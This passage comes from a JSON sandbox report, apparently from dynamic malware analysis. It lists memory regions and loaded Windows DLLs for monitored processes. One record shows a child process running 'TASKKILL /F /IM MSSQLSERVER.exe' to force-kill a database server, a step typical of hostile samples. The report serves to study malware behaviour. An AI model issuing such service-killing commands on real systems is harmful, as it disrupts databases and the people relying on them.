"\\Windows\\SysWOW64\\lpk.dll", "id": "region_3386", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:27.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3387", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:27.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3388", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:27.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3389", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:27.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3390", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:27.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3391", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:27.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3392", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:27.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4816895, "entry_point": 0, "filename": null, "id": "region_3393", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:27.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3394", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:27.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3395", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:27.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3396", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:27.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_3397", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:27.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 999423, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3398", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:27.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_3399", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_3400", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_3401", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 1769472, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3402", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1769472, "timestamp": "00:01:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 7213055, "entry_point": 0, "filename": null, "id": "region_3403", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:01:27.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_3404", "name": "pagefile_0x0000000000830000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8585216, "timestamp": "00:01:27.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31260671, "entry_point": 0, "filename": null, "id": "region_3405", "name": "private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:01:27.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 31522815, "entry_point": 0, "filename": null, "id": "region_3406", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:01:27.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 32047103, "entry_point": 0, "filename": null, "id": "region_3407", "name": "private_0x0000000001e50000", "norm_filename": null, "region_type": "private_memory", "start_va": 31784960, "timestamp": "00:01:27.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3408", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:27.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3409", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:27.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_3410", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:01:27.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3411", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:27.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3412", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:27.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 30670847, "entry_point": 0, "filename": null, "id": "region_3413", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:01:27.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 33095679, "entry_point": 0, "filename": null, "id": "region_3414", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:01:27.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3415", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:27.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_3416", "name": "private_0x0000000001e10000", "norm_filename": null, "region_type": "private_memory", "start_va": 31522816, "timestamp": "00:01:27.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 36040703, "entry_point": 33095680, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3417", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33095680, "timestamp": "00:01:27.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36438016, "type": "region", "version": 1 }, "end_va": 36700159, "entry_point": 0, "filename": null, "id": "region_3418", "name": "private_0x00000000022c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36438016, "timestamp": "00:01:27.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3419", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:27.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3420", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:27.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3421", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:27.644", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3422", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:27.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 5111807, "entry_point": 0, "filename": null, "id": "region_3423", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:01:27.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30998527, "entry_point": 0, "filename": null, "id": "region_3424", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:01:27.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 36372479, "entry_point": 0, "filename": null, "id": "region_3425", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, "timestamp": "00:01:27.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_3426", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:01:27.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3427", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:27.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3428", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:27.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3429", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:27.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1782906880, "type": "region", "version": 1 }, "end_va": 1783521279, "entry_point": 1783036089, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3430", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1782906880, "timestamp": "00:01:27.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1786576896, "type": "region", "version": 1 }, "end_va": 1786675199, "entry_point": 1786581813, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3431", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1786576896, "timestamp": "00:01:27.732", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM MSSQLSERVER.exe /IM MSSQLSERVER.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_27", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 27, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3432", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:27.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3433", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:27.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3434", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:27.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3435", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:27.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3436", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:27.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_3437", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:27.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_3438", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:01:27.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 14352384, "type": "region", "version": 1 }, "end_va": 14442495, "entry_point": 14376073, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3439", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 14352384, "timestamp": "00:01:27.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3440", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:27.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3441", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:27.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3442", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3443", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3444", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3445", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3446", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" 